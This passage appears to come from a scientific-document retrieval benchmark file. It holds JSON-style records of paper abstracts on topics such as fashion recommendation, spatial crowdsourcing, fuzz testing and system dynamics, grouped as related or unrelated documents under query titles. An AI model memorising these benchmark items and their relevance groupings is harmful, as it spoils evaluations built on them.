"text": "This letter presents a new metamaterial-based waveguide technology referred to as ridge gap waveguides. The main advantages of the ridge gap waveguides compared to hollow waveguides are that they are planar and much cheaper to manufacture, in particular at high frequencies such as for millimeter and sub- millimeter waves. The latter is due to the fact that there are no mechanical joints across which electric currents must float. The gap waveguides have lower losses than microstrip lines, and they are completely shielded by metal so no additional packaging is needed, in contrast to the severe packaging problems associated with microstrip circuits. The gap waveguides are realized in a narrow gap between two parallel metal plates by using a texture or multilayer structure on one of the surfaces. The waves follow metal ridges in the textured surface. All wave propagation in other directions is prohibited (in cutoff) by realizing a high surface impedance (ideally a perfect magnetic conductor) in the textured surface at both sides of all ridges. Thereby, cavity resonances do not appear either within the band of operation. The present letter introduces the gap waveguide and presents some initial simulated results.",
"title": ""
},
{
"docid": "de4e2e131a0ceaa47934f4e9209b1cdd",
"text": "With the popularity of mobile devices, spatial crowdsourcing is rising as a new framework that enables human workers to solve tasks in the physical world. With spatial crowdsourcing, the goal is to crowdsource a set of spatiotemporal tasks (i.e., tasks related to time and location) to a set of workers, which requires the workers to physically travel to those locations in order to perform the tasks. In this article, we focus on one class of spatial crowdsourcing, in which the workers send their locations to the server and thereafter the server assigns to every worker tasks in proximity to the worker’s location with the aim of maximizing the overall number of assigned tasks. We formally define this maximum task assignment (MTA) problem in spatial crowdsourcing, and identify its challenges. We propose alternative solutions to address these challenges by exploiting the spatial properties of the problem space, including the spatial distribution and the travel cost of the workers. MTA is based on the assumptions that all tasks are of the same type and all workers are equally qualified in performing the tasks. Meanwhile, different types of tasks may require workers with various skill sets or expertise. Subsequently, we extend MTA by taking the expertise of the workers into consideration. We refer to this problem as the maximum score assignment (MSA) problem and show its practicality and generality. Extensive experiments with various synthetic and two real-world datasets show the applicability of our proposed framework.",
"title": ""
},
{
"docid": "b38529e74442de80822204b63d061e3e",
"text": "Factors other than age and genetics may increase the risk of developing Alzheimer disease (AD). Accumulation of the amyloid-β (Aβ) peptide in the brain seems to initiate a cascade of key events in the pathogenesis of AD. Moreover, evidence is emerging that the sleep–wake cycle directly influences levels of Aβ in the brain. In experimental models, sleep deprivation increases the concentration of soluble Aβ and results in chronic accumulation of Aβ, whereas sleep extension has the opposite effect. Furthermore, once Aβ accumulates, increased wakefulness and altered sleep patterns develop. Individuals with early Aβ deposition who still have normal cognitive function report sleep abnormalities, as do individuals with very mild dementia due to AD. Thus, sleep and neurodegenerative disease may influence each other in many ways that have important implications for the diagnosis and treatment of AD.",
"title": ""
}
] | scidocsrr |
aec3495b00da5eac9d2efd3fd0ce67c1 | Complete the Look: Scene-based Complementary Product Recommendation | [
{
"docid": "0a625d5f0164f7ed987a96510c1b6092",
"text": "We present a method that learns to answer visual questions by selecting image regions relevant to the text-based query. Our method maps textual queries and visual features from various regions into a shared space where they are compared for relevance with an inner product. Our method exhibits significant improvements in answering questions such as \"what color,\" where it is necessary to evaluate a specific location, and \"what room,\" where it selectively identifies informative image regions. Our model is tested on the recently released VQA [1] dataset, which features free-form human-annotated questions and answers.",
"title": ""
},
{
"docid": "26884c49c5ada3fc80dbc2f2d1e5660b",
"text": "We introduce a complete pipeline for recognizing and classifying people’s clothing in natural scenes. This has several interesting applications, including e-commerce, event and activity recognition, online advertising, etc. The stages of the pipeline combine a number of state-of-the-art building blocks such as upper body detectors, various feature channels and visual attributes. The core of our method consists of a multi-class learner based on a Random Forest that uses strong discriminative learners as decision nodes. To make the pipeline as automatic as possible we also integrate automatically crawled training data from the web in the learning process. Typically, multi-class learning benefits from more labeled data. Because the crawled data may be noisy and contain images unrelated to our task, we extend Random Forests to be capable of transfer learning from different domains. For evaluation, we define 15 clothing classes and introduce a benchmark data set for the clothing classification task consisting of over 80, 000 images, which we make publicly available. We report experimental results, where our classifier outperforms an SVM baseline with 41.38 % vs 35.07 % average accuracy on challenging benchmark data.",
"title": ""
},
{
"docid": "790de0f792c81b9e26676f800e766759",
"text": "The ubiquity of online fashion shopping demands effective recommendation services for customers. In this paper, we study two types of fashion recommendation: (i) suggesting an item that matches existing components in a set to form a stylish outfit (a collection of fashion items), and (ii) generating an outfit with multimodal (images/text) specifications from a user. To this end, we propose to jointly learn a visual-semantic embedding and the compatibility relationships among fashion items in an end-to-end fashion. More specifically, we consider a fashion outfit to be a sequence (usually from top to bottom and then accessories) and each item in the outfit as a time step. Given the fashion items in an outfit, we train a bidirectional LSTM (Bi-LSTM) model to sequentially predict the next item conditioned on previous ones to learn their compatibility relationships. Further, we learn a visual-semantic space by regressing image features to their semantic representations aiming to inject attribute and category information as a regularization for training the LSTM. The trained network can not only perform the aforementioned recommendations effectively but also predict the compatibility of a given outfit. We conduct extensive experiments on our newly collected Polyvore dataset, and the results provide strong qualitative and quantitative evidence that our framework outperforms alternative methods.",
"title": ""
},
{
"docid": "4322f123ff6a1bd059c41b0037bac09b",
"text": "Nowadays, as a beauty-enhancing product, clothing plays an important role in human's social life. In fact, the key to a proper outfit usually lies in the harmonious clothing matching. Nevertheless, not everyone is good at clothing matching. Fortunately, with the proliferation of fashion-oriented online communities, fashion experts can publicly share their fashion tips by showcasing their outfit compositions, where each fashion item (e.g., a top or bottom) usually has an image and context metadata (e.g., title and category). Such rich fashion data offer us a new opportunity to investigate the code in clothing matching. However, challenges co-exist with opportunities. The first challenge lies in the complicated factors, such as color, material and shape, that affect the compatibility of fashion items. Second, as each fashion item involves multiple modalities (i.e., image and text), how to cope with the heterogeneous multi-modal data also poses a great challenge. Third, our pilot study shows that the composition relation between fashion items is rather sparse, which makes traditional matrix factorization methods not applicable. Towards this end, in this work, we propose a content-based neural scheme to model the compatibility between fashion items based on the Bayesian personalized ranking (BPR) framework. The scheme is able to jointly model the coherent relation between modalities of items and their implicit matching preference. Experiments verify the effectiveness of our scheme, and we deliver deep insights that can benefit future research.",
"title": ""
}
] | [
{
"docid": "444a6e64bfc9a76a9ef6d122e746e457",
"text": "When performing tasks, humans are thought to adopt task sets that configure moment-to-moment data processing. Recently developed mixed blocked/event-related designs allow task set-related signals to be extracted in fMRI experiments, including activity related to cues that signal the beginning of a task block, \"set-maintenance\" activity sustained for the duration of a task block, and event-related signals for different trial types. Data were conjointly analyzed from mixed design experiments using ten different tasks and 183 subjects. Dorsal anterior cingulate cortex/medial superior frontal cortex (dACC/msFC) and bilateral anterior insula/frontal operculum (aI/fO) showed reliable start-cue and sustained activations across all or nearly all tasks. These regions also carried the most reliable error-related signals in a subset of tasks, suggesting that the regions form a \"core\" task-set system. Prefrontal regions commonly related to task control carried task-set signals in a smaller subset of tasks and lacked convergence across signal types.",
"title": ""
},
{
"docid": "bb447bbd4df92339bace55dc5610fbcc",
"text": "Fuzz testing has helped security researchers and organizations discover a large number of vulnerabilities. Although it is efficient and widely used in industry, hardly any empirical studies and experience exist on the customization of fuzzers to real industrial projects. In this paper, collaborating with the engineers from Huawei, we present the practice of adapting fuzz testing to a proprietary message middleware named libmsg, which is responsible for the message transfer of the entire distributed system department. We present the main obstacles coming across in applying an efficient fuzzer to libmsg, including system configuration inconsistency, system build complexity, fuzzing driver absence. The solutions for those typical obstacles are also provided. For example, for the most difficult and expensive obstacle of writing fuzzing drivers, we present a low-cost approach by converting existing sample code snippets into fuzzing drivers. After overcoming those obstacles, we can effectively identify software bugs, and report 9 previously unknown vulnerabilities, including flaws that lead to denial of service or system crash.",
"title": ""
},
{
"docid": "909e55c3359543bf7ed3e5659d7cc27f",
"text": "We study the link between family violence and the emotional cues associated with wins and losses by professional football teams. We hypothesize that the risk of violence is affected by the “gain-loss” utility of game outcomes around a rationally expected reference point. Our empirical analysis uses police reports of violent incidents on Sundays during the professional football season. Controlling for the pregame point spread and the size of the local viewing audience, we find that upset losses (defeats when the home team was predicted to win by four or more points) lead to a 10% increase in the rate of at-home violence by men against their wives and girlfriends. In contrast, losses when the game was expected to be close have small and insignificant effects. Upset wins (victories when the home team was predicted to lose) also have little impact on violence, consistent with asymmetry in the gain-loss utility function. The rise in violence after an upset loss is concentrated in a narrow time window near the end of the game and is larger for more important games. We find no evidence for reference point updating based on the halftime score.",
"title": ""
},
{
"docid": "e153d11b932e303d65cee83803fec739",
"text": "Recently, open-domain question answering (QA) has been combined with machine comprehension models to find answers in a large knowledge source. As open-domain QA requires retrieving relevant documents from text corpora to answer questions, its performance largely depends on the performance of document retrievers. However, since traditional information retrieval systems are not effective in obtaining documents with a high probability of containing answers, they lower the performance of QA systems. Simply extracting more documents increases the number of irrelevant documents, which also degrades the performance of QA systems. In this paper, we introduce Paragraph Ranker which ranks paragraphs of retrieved documents for a higher answer recall with less noise. We show that ranking paragraphs and aggregating answers using Paragraph Ranker improves performance of open-domain QA pipeline on the four opendomain QA datasets by 7.8% on average.",
"title": ""
},
{
"docid": "bcb45064e07cf9bc3b3686f9ce18b422",
"text": "Detection of speaker, channel and environment changes in a continuous audio stream is important in various applications (e.g., broadcast news, meetings/teleconferences etc.). Standard schemes for segmentation use a classi er and hence do not generalize to unseen speaker / channel / environments. Recently S.Chen introduced new segmentation and clustering algorithms, using the so-called BIC. This paper presents more accurate and more e cient variants of the BIC scheme for segmentation and clustering. Speci cally, the new algorithms improve the speed and accuracy of segmentation and clustering and allow for a real-time implementation of simultaneous transcription, segmentation and speaker tracking.",
"title": ""
},
{
"docid": "dd05084594640b9ab87c702059f7a366",
"text": "Researchers and theorists have proposed that feelings of attachment to subgroups within a larger online community or site can increase users' loyalty to the site. They have identified two types of attachment, with distinct causes and consequences. With bond-based attachment, people feel connections to other group members, while with identity-based attachment they feel connections to the group as a whole. In two experiments we show that these feelings of attachment to subgroups increase loyalty to the larger community. Communication with other people in a subgroup but not simple awareness of them increases attachment to the larger community. By varying how the communication is structured, between dyads or with all group members simultaneously, the experiments show that bond- and identity-based attachment have different causes. But the experiments show no evidence that bond and identity attachment have different consequences. We consider both theoretical and methodological reasons why the consequences of bond-based and identity-based attachment are so similar.",
"title": ""
},
{
"docid": "7c829563e98a6c75eb9b388bf0627271",
"text": "Research in learning analytics and educational data mining has recently become prominent in the fields of computer science and education. Most scholars in the field emphasize student learning and student data analytics; however, it is also important to focus on teaching analytics and teacher preparation because of their key roles in student learning, especially in K-12 learning environments. Nonverbal communication strategies play an important role in successful interpersonal communication of teachers with their students. In order to assist novice or practicing teachers with exhibiting open and affirmative nonverbal cues in their classrooms, we have designed a multimodal teaching platform with provisions for online feedback. We used an interactive teaching rehearsal software, TeachLivE, as our basic research environment. TeachLivE employs a digital puppetry paradigm as its core technology. Individuals walk into this virtual environment and interact with virtual students displayed on a large screen. They can practice classroom management, pedagogy and content delivery skills with a teaching plan in the TeachLivE environment. We have designed an experiment to evaluate the impact of an online nonverbal feedback application. In this experiment, different types of multimodal data have been collected during two experimental settings. These data include talk-time and nonverbal behaviors of the virtual students, captured in log files; talk time and full body tracking data of the participant; and video recording of the virtual classroom with the participant. 34 student teachers participated in this 30-minute experiment. In each of the settings, the participants were provided with teaching plans from which they taught. All the participants took part in both of the experimental settings. In order to have a balanced experiment design, half of the participants received nonverbal online feedback in their first session and the other half received this feedback in the second session. A visual indication was used for feedback each time the participant exhibited a closed, defensive posture. Based on recorded full-body tracking data, we observed that only those who received feedback in their first session demonstrated a significant number of open postures in the session containing no feedback. However, the post-questionnaire information indicated that all participants were more mindful of their body postures while teaching after they had participated in the study.",
"title": ""
},
{
"docid": "3f96a3cd2e3f795072567a3f3c8ccc46",
"text": "Good corporate reputations are critical because of their potential for value creation, but also because their intangible character makes replication by competing firms considerably more difficult. Existing empirical research confirms that there is a positive relationship between reputation and financial performance. This paper complements these findings by showing that firms with relatively good reputations are better able to sustain superior profit outcomes over time. In particular, we undertake an analysis of the relationship between corporate reputation and the dynamics of financial performance using two complementary dynamic models. We also decompose overall reputation into a component that is predicted by previous financial performance, and that which is ‘left over’, and find that each (orthogonal) element supports the persistence of above-average profits over time. Copyright 2002 John Wiley & Sons, Ltd.",
"title": ""
},
{
"docid": "18810138af571332e67d42c27816cf6b",
"text": "In this work we address the task of segmenting an object into its parts, or semantic part segmentation. We start by adapting a state-of-the-art semantic segmentation system to this task, and show that a combination of a fully-convolutional Deep CNN system coupled with Dense CRF labelling provides excellent results for a broad range of object categories. Still, this approach remains agnostic to highlevel constraints between object parts. We introduce such prior information by means of the Restricted Boltzmann Machine, adapted to our task and train our model in an discriminative fashion, as a hidden CRF, demonstrating that prior information can yield additional improvements. We also investigate the performance of our approach “in the wild”, without information concerning the objects’ bounding boxes, using an object detector to guide a multi-scale segmentation scheme. We evaluate the performance of our approach on the Penn-Fudan and LFW datasets for the tasks of pedestrian parsing and face labelling respectively. We show superior performance with respect to competitive methods that have been extensively engineered on these benchmarks, as well as realistic qualitative results on part segmentation, even for occluded or deformable objects. We also provide quantitative and extensive qualitative results on three classes from the PASCAL Parts dataset. Finally, we show that our multi-scale segmentation scheme can boost accuracy, recovering segmentations for finer parts.",
"title": ""
},
{
"docid": "1ee33deb30b4ffae5ea16dc4ad2f93ff",
"text": "Neural network quantization has become an important research area due to its great impact on deployment of large models on resource constrained devices. In order to train networks that can be effectively discretized without loss of performance, we introduce a differentiable quantization procedure. Differentiability can be achieved by transforming continuous distributions over the weights and activations of the network to categorical distributions over the quantization grid. These are subsequently relaxed to continuous surrogates that can allow for efficient gradient-based optimization. We further show that stochastic rounding can be seen as a special case of the proposed approach and that under this formulation the quantization grid itself can also be optimized with gradient descent. We experimentally validate the performance of our method on MNIST, CIFAR 10 and Imagenet classification.",
"title": ""
},
{
"docid": "046837c87b6d6c789cc060c1dfa273c0",
"text": "The last 20 years have seen ever-increasing research activity in the field of human activity recognition. With activity recognition having considerably matured, so has the number of challenges in designing, implementing, and evaluating activity recognition systems. This tutorial aims to provide a comprehensive hands-on introduction for newcomers to the field of human activity recognition. It specifically focuses on activity recognition using on-body inertial sensors. We first discuss the key research challenges that human activity recognition shares with general pattern recognition and identify those challenges that are specific to human activity recognition. We then describe the concept of an Activity Recognition Chain (ARC) as a general-purpose framework for designing and evaluating activity recognition systems. We detail each component of the framework, provide references to related research, and introduce the best practice methods developed by the activity recognition research community. We conclude with the educational example problem of recognizing different hand gestures from inertial sensors attached to the upper and lower arm. We illustrate how each component of this framework can be implemented for this specific activity recognition problem and demonstrate how different implementations compare and how they impact overall recognition performance.",
"title": ""
},
{
"docid": "b4b0cbc448b45d337627b39029b6c60e",
"text": "Multi-task learning (MTL) improves the prediction performance on multiple, different but related, learning problems through shared parameters or representations. One of the most prominent multi-task learning algorithms is an extension to support vector machines (svm) by Evgeniou et al. [15]. Although very elegant, multi-task svm is inherently restricted by the fact that support vector machines require each class to be addressed explicitly with its own weight vector which, in a multi-task setting, requires the different learning tasks to share the same set of classes. This paper proposes an alternative formulation for multi-task learning by extending the recently published large margin nearest neighbor (lmnn) algorithm to the MTL paradigm. Instead of relying on separating hyperplanes, its decision function is based on the nearest neighbor rule which inherently extends to many classes and becomes a natural fit for multi-task learning. We evaluate the resulting multi-task lmnn on real-world insurance data and speech classification problems and show that it consistently outperforms single-task kNN under several metrics and state-of-the-art MTL classifiers.",
"title": ""
},
{
"docid": "f573c79dde4ce12c234df084dea149b4",
"text": "The presence of geometric details on object surfaces dramatically changes the way light interacts with these surfaces. Although synthesizing realistic pictures requires simulating this interaction as faithfully as possible, explicitly modeling all the small details tends to be impractical. To address these issues, an image-based technique called relief mapping has recently been introduced for adding per-fragment details onto arbitrary polygonal models (Policarpo et al. 2005). The technique has been further extended to render correct silhouettes (Oliveira and Policarpo 2005) and to handle non-height-field surface details (Policarpo and Oliveira 2006). In all its variations, the ray-height-field intersection is performed using a binary search, which refines the result produced by some linear search procedure. While the binary search converges very fast, the linear search (required to avoid missing large structures) is prone to aliasing, by possibly missing some thin structures, as is evident in Figure 18-1a. Several space-leaping techniques have since been proposed to accelerate the ray-height-field intersection and to minimize the occurrence of aliasing (Donnelly 2005, Dummer 2006, Baboud and Décoret 2006). Cone step mapping (CSM) (Dummer 2006) provides a clever solution to accelerate the intersection calculation for the average case and avoids skipping height-field structures by using some precomputed data (a cone map). However, because CSM uses a conservative approach, the rays tend to stop before the actual surface, which introduces different Relaxed Cone Stepping for Relief Mapping",
"title": ""
},
{
"docid": "00dbe58bcb7d4415c01a07255ab7f365",
"text": "The paper deals with a time varying vehicle-to-vehicle channel measurement in the 60 GHz millimeter wave (MMW) band using a unique time-domain channel sounder built from off-the-shelf components and standard measurement devices and employing Golay complementary sequences as the excitation signal. The aim of this work is to describe the sounder architecture, primary data processing technique, achievable system parameters, and preliminary measurement results. We measured the signal propagation between two passing vehicles and characterized the signal reflected by a car driving on a highway. The proper operation of the channel sounder is verified by a reference measurement performed with an MMW vector network analyzer in a rugged stationary office environment. The goal of the paper is to show the measurement capability of the sounder and its superior features like 8 GHz measuring bandwidth enabling high time resolution or good dynamic range allowing an analysis of weak multipath components.",
"title": ""
},
{
"docid": "7568508f9bb5d45f7cd24ddf9da46c1f",
"text": "Boosting is a set of methods for the construction of classifier ensembles. The differential feature of these methods is that they allow to obtain a strong classifier from the combination of weak classifiers. Therefore, it is possible to use boosting methods with very simple base classifiers. One of the most simple classifiers are decision stumps, decision trees with only one decision node. This work proposes a variant of the most well-known boosting method, AdaBoost. It is based on considering, as the base classifiers for boosting, not only the last weak classifier, but a classifier formed by the last r selected weak classifiers (r is a parameter of the method). If the weak classifiers are decision stumps, the combination of r weak classifiers is a decision tree. The ensembles obtained with the variant are formed by the same number of decision stumps than the original AdaBoost. Hence, the original version and the variant produce classifiers with very similar sizes and computational complexities (for training and classification). The experimental study shows that the variant is clearly beneficial. 2007 Elsevier B.V. All rights reserved.",
"title": ""
},
{
"docid": "8609f49cc78acc1ba25e83c8e68040a6",
"text": "Time series shapelets are small, local patterns in a time series that are highly predictive of a class and are thus very useful features for building classifiers and for certain visualization and summarization tasks. While shapelets were introduced only recently, they have already seen significant adoption and extension in the community. Despite their immense potential as a data mining primitive, there are two important limitations of shapelets. First, their expressiveness is limited to simple binary presence/absence questions. Second, even though shapelets are computed offline, the time taken to compute them is significant. In this work, we address the latter problem by introducing a novel algorithm that finds shapelets in less time than current methods by an order of magnitude. Our algorithm is based on intelligent caching and reuse of computations, and the admissible pruning of the search space. Because our algorithm is so fast, it creates an opportunity to consider more expressive shapelet queries. In particular, we show for the first time an augmented shapelet representation that distinguishes the data based on conjunctions or disjunctions of shapelets. We call our novel representation Logical-Shapelets. We demonstrate the efficiency of our approach on the classic benchmark datasets used for these problems, and show several case studies where logical shapelets significantly outperform the original shapelet representation and other time series classification techniques. We demonstrate the utility of our ideas in domains as diverse as gesture recognition, robotics, and biometrics.",
"title": ""
},
{
"docid": "5f120ae2429d7b3c8085f96a63eae817",
"text": "Background: Antenatal mothers with anemia are high risk to varieties of health implications as well as to their off springs. Many studies show a high mortality and morbidity related to anemia in pregnancy. Methods: This cross-sectional study was designed to determine factors associated with anemia amongst forty seven antenatal mothers attending Antenatal Clinic at Klinik Kesihatan Kuala Besut, Terengganu in November 2009. Systematic random sampling was applied and information gathered based on patients’ medical records and through face-to-face interviewed by using a structured questionnaire. Results: The mean age of respondents was 28.3 year-old. More than half of mothers were multigravidas. Of 47 respondents, 57.4% (95% CI: 43.0, 72.0) was anemic. The proportion of anemia was high for grand multigravidas mother (66.7%), those at third trimester of pregnancy (70.4%), did antenatal booking at first trimester (65.4%), poor haematinic compliance (76.5%), not taking any medication (60.5%), those with no co-morbid illnesses (60.0%), mothers with high education level (71.4%) and those with satisfactory monthly income (61.5%). The proportion of anemia was 58.3% and 57.1% for mothers with last child birth spacing of two years or less and more than two years accordingly. There was a significant association of haematinic compliance with the anemia (OR: 4.571; 95% CI: 1.068, 19.573). Conclusions: Antenatal mothers in this area have a substantial proportion of anemia despite of freely and routinely prescription of haematinic at primary health care centers. Poor haematinic compliance was a significant risk factor. Health education programs regarding haematinic compliance and adequate intake of iron rich diet during pregnancy need to be strengthened to curb this problem. *Corresponding author: NH Nik Rosmawati, Environmental Health Unit, Department of Community Medicine, School of Medical Science, Health Campus, Universiti Sains Malaysia, 16150 Kubang Kerian, Kelantan, Malaysia, E-mail: rosmawati@kk.usm.my Received May 03, 2012; Accepted May 24, 2012; Published May 26, 2012 Citation: Nik Rosmawati NH, Mohd Nazri S, Mohd Ismail I (2012) The Rate and Risk Factors for Anemia among Pregnant Mothers in Jerteh Terengganu, Malaysia. J Community Med Health Educ 2:150. doi:10.4172/2161-0711.1000150 Copyright: © 2012 Nik Rosmawati NH, et al. This is an open-access article distributed under the terms of the Creative Commons Attribution License, which permits unrestricted use, distribution, and reproduction in any medium, provided the original author and source are credited.",
"title": ""
},
{
"docid": "1258939378850f7d89f6fa860be27c39",
"text": "Sparse methods and the use of Winograd convolutions are two orthogonal approaches, each of which significantly accelerates convolution computations in modern CNNs. Sparse Winograd merges these two and thus has the potential to offer a combined performance benefit. Nevertheless, training convolution layers so that the resulting Winograd kernels are sparse has not hitherto been very successful. By introducing a Winograd layer in place of a standard convolution layer, we can learn and prune Winograd coefficients “natively” and obtain sparsity level beyond 90% with only 0.1% accuracy loss with AlexNet on ImageNet dataset. Furthermore, we present a sparse Winograd convolution algorithm and implementation that exploits the sparsity, achieving up to 31.7 effective TFLOP/s in 32-bit precision on a latest Intel Xeon CPU, which corresponds to a 5.4× speedup over a state-of-the-art dense convolution implementation.",
"title": ""
},
{
"docid": "42e07265a724f946fe7c76b7d858279d",
"text": "This work investigates design optimisation and design trade-offs for multi-kW DC-DC Interleaved Boost Converters (IBC). A general optimisation procedure for weight minimisation is presented, and the trade-offs between the key design variables (e.g. switching frequency, topology) and performance metrics (e.g. power density, efficiency) are explored. It is shown that the optimal selection of components, switching frequency, and topology are heavily dependent on operating specifications such as voltage ratio, output voltage, and output power. With the device and component technologies considered, the single-phase boost converter is shown to be superior to the interleaved topologies in terms of power density for lower power, lower voltage specifications, whilst for higher-power specifications, interleaved designs are preferable. Comparison between an optimised design and an existing prototype for a 220 V–600 V, 40 kW specification, further illustrates the potential weight reduction that is afforded through design optimisation, with the optimised design predicting a reduction in component weight of around 33%.",
"title": ""
}
] | scidocsrr |
b945d47777ceb1095a9d073dcce35810 | Fast and Accurate Prediction of Sentence Specificity | [
{
"docid": "3b0b6075cf6cdb13d592b54b85cdf4af",
"text": "We address the problem of sentence alignment for monolingual corpora, a phenomenon distinct from alignment in parallel corpora. Aligning large comparable corpora automatically would provide a valuable resource for learning of text-totext rewriting rules. We incorporate context into the search for an optimal alignment in two complementary ways: learning rules for matching paragraphs using topic structure and further refining the matching through local alignment to find good sentence pairs. Evaluation shows that our alignment method outperforms state-of-the-art systems developed for the same task.",
"title": ""
}
] | [
{
"docid": "b83351de72da4c2fdeec1da10eb4a5eb",
"text": "How to determine the impact of soft variables, including intangibles or social variables, and combining them as necessary with hard variables in system dynamics models is a significant challenge. This paper identifies a weakness in system dynamics modelling practice, that is, in reliably incorporating soft variables into system dynamics models. A method for incorporating such variables and a basis for further research is offered. The method combines systems thinking, research into causality analysis, multiple criteria decision analysis (conjoint analysis) and system dynamics modelling, in an integrated approach. “To omit such [soft] variables is equivalent to saying that they have zero effect – probably the only value that is known to be wrong!” (Forrester, 1961: 57) It is inescapable that from time-to-time we will need to build system dynamics models that take soft i variables into account. The challenge is to incorporate the influences of soft variables in ways that produce meaningful, reliable and repeatable results. We need to develop in-depth understanding of the roles and influences of soft variables. We must avoid making guesses about the influences that soft variables might have. Rather, we must create and repeatedly test dynamic hypotheses about soft variables. This will also demand that we comprehensively document our hypotheses about influences and how those influences are produced and combined, making the results available for peer review. Only when we do this will we build a sound appreciation of the nature and significance of soft variables both in our models and in the real world. Our track record in this area is not as good as it might be, as the following example suggests. Pseudo-algebraic Expressions in System Dynamics Models – An Example It is disturbing to encounter system dynamics models reflecting guesses about soft variables and as a result containing pseudo-algebraic expressions conveniently and artificially contrived to make a model or simulation behave as the modeller intends. Evidence of this practice can be found in models produced by students and experienced practitioners alike. Pseudoalgebraic expressions are a corruption of mathematical logic used to conveniently and artificially combine quantified soft variables. Such expressions may also involve mixes of hard and quantified soft variables. The assumptions underlying this practice seem to be that soft variables, including that class of soft variables known as ‘intangibles’: • conform to numerical scales; • can be quantified in an absolute sense; • quantification is both valid and universally acceptable; and • once quantified, soft variables can be treated as dimensionless variables that can be added or multiplied ii in exactly the same way as ordinary variables encountered routinely in system dynamics modelling are. In their totality, these assumptions are erroneous; when taken individually, caution is needed. Further, any practice leading to the creation of pseudo-algebraic expressions, or their use, must be closely scrutinised. In one particular example seen recently, a management flight simulator was built to assist in training managers to make decisions in the complex dynamic environment a particular firm operates. The underlying model contained around 60 variables, of which some 20 could only be described as being soft. Algebraic expressions made up of interesting mixes of hard and soft variables were built into the model to replicate the modes of behaviour that the modeller had identified as important . One expression in the model contained the soft variables Organisational_Performance, Qualifications_Held_By_ Individuals, and Individual’s_Motivation_Level. Organisational_Performance was intended to describe how well the organisation performed (in an average sense, rather than in relation to discrete events) in making decisions, where decision makers were required to draw upon their own knowledge, skill and competence. Qualifications_Held_By_ Individuals described how well equipped individuals, in terms of formal qualifications held (including skills and competencies), were to make decisions and Individual’s_Motivation_Level indicated motivation of individuals to take action, make the necessary decisions, or to implement a particular strategy. The resulting algebraic expression took the form: _ _ _ _ ' _ Organisational Performance Qualifications Held By Individual x Individual s Motivation Level = _ The abuse of mathematical logic and system dynamics principles in this example should be self-evident. Despite obvious flaws in the model, the paper describing this model was peer reviewed and ultimately accepted for a recent international system dynamics conference. This suggests that as a group, we are prepared to accept these dubious modelling practices? The intent of the modeller in producing this simulator was genuine although surprisingly naïve. The modeller apparently set out to do exactly what we teach, that is, to replicate observed reference modes of behaviour. Our actions, both in terms of learning and system dynamics modelling practice are both misguided and naïve if we do not critically investigate why and how reference modes of behaviour are produced. In this instance, it seems that the modeller was actually mimicking what he saw as an important reference mode of behaviour without having a clear understanding of how that particular reference mode was actually created in the real world, or if he did he did not have the necessary tools (either physical or intellectual) to build a faithful representation of the causal mechanisms. In this instance, and probably of greater concern is that how the particular reference mode of behaviour was actually created is unlikely ever to be questioned by anybody subsequently flying the management flight simulator in a training session. This is because the underlying structure of the model and its code, that making the simulator behave as it does, are masked from the players. Players, like the layperson in many real-life systemic problem situations will focus on the responses to their actions, rather than the (obscured) mechanisms producing the responses. The absence of essential critical analysis in such instances is very likely to lead to the unfortunate consequences that: • poor practices become embedded in the design of simulations; • erroneous conclusions are drawn about systemic causality, where soft variables are involved; and • fallacious learning experiences occur. This suggests we must look seriously at the treatment of soft variables in system dynamics modelling. Need to Take a Hard Look at Soft Variables in System Dynamics Models Sterman (2002: 522-523) makes the following points regarding soft variables in system dynamics models: • Soft variables should be included in our models if they are important to the purpose. • Omitting structures of variables known to be important because numerical data are unavailable is actually less scientific and less accurate than using your best judgement to estimate their values. Omitting concepts because they have no numerical data is a sure route to narrow model boundaries, biased results and policy resistance. • We must evaluate the sensitivity of our results to uncertainty in assumptions – whether we estimated the parameters judgmentally iv or by statistical means. • It is important to use proper statistical methods to estimate parameters and assess the ability of the model to replicate historical data when numerical data are available. Rigorously defined constructs, attempting to measure them, and using the most appropriate methods to estimate their magnitudes are important antidotes to causal empiricism, muddled formulations and erroneous conclusions we often draw from our mental models . • Most importantly, we should not accept the availability of data as given, as outside the boundaries of our project or research. We must ask why concepts our modelling suggests are important have not been measured. Frequently it is because no one thought these concepts were important...[stemming] from the narrow boundaries of our understanding. • Human creativity is great: once we recognise the importance of a concept, we can almost always find ways to measure it. Today, many apparently soft variables such as customer perceptions of quality, employee morale, investor optimism, and political values are routinely quantified with tools such as content analysis, surveys, and conjoint analysis . • Of course all measurements are imperfect. Metrics for so-called soft variables continue to be refined, just as metrics for so-called hard variables are. Quantification often yields important insights into the structure and dynamics of a problem. Often, the greatest benefit of a modelling project is to help the client see the importance of and begin to measure and account for soft variables and concepts previously ignored. Simply put, we need to take soft variables into account when they are likely to have an impact; priority for incorporating such variables, as in the case of hard variables, must be based on the likely extent of their impact. If these variables are likely to have an impact and are, therefore, worthy of inclusion in our models, we should measure them if we can. If we cannot measure them, we should estimate them as best we can by methods that give consistent, repeatable and reliable results. We cannot afford to take shortcuts and indulge in poor modelling practices regardless of how tempting and convenient it might appear to be at the time; to do so could seriously damage confidence in the system dynamics modelling discipline or, even worse, destroy our credibility. Purpose of This Paper How to determine the impact of soft variables, including intangibles or social variables, and combining them through the system dynamics modelling process with hard variables is particularly vexing . This paper offers a method of incorporating soft variables i",
"title": ""
},
{
"docid": "a4969e82e3cccf5c9ca7177d4ca5007c",
"text": "Traditional views of automaticity are in need of revision. For example, automaticity often has been treated as an all-or-none phenomenon, and traditional theories have held that automatic processes are independent of attention. Yet recent empirical data suggest that automatic processes are continuous, and furthermore are subject to attentional control. A model of attention is presented to address these issues. Within a parallel distributed processing framework, it is proposed that the attributes of automaticity depend on the strength of a processing pathway and that strength increases with training. With the Stroop effect as an example, automatic processes are shown to be continuous and to emerge gradually with practice. Specifically, a computational model of the Stroop task simulates the time course of processing as well as the effects of learning. This was accomplished by combining the cascade mechanism described by McClelland (1979) with the backpropagation learning algorithm (Rumelhart, Hinton, & Williams, 1986). The model can simulate performance in the standard Stroop task, as well as aspects of performance in variants of this task that manipulate stimulus-onset asynchrony, response set, and degree of practice. The model presented is contrasted against other models, and its relation to many of the central issues in the literature on attention, automaticity, and interference is discussed.",
"title": ""
},
{
"docid": "ed5d83c524e9e2a30a537115184b9d13",
"text": "Abstract Stan is a free and open-source C++ program that performs Bayesian inference or optimization for arbitrary user-specified models and can be called from the command line, R, Python, Matlab, or Julia, and has great promise for fitting large and complex statistical models in many areas of application. We discuss Stan from users’ and developers’ perspective and illustrate with a simple but nontrivial nonlinear regression example.",
"title": ""
},
{
"docid": "5f4330e3ddd6339cf340a72c73d2106b",
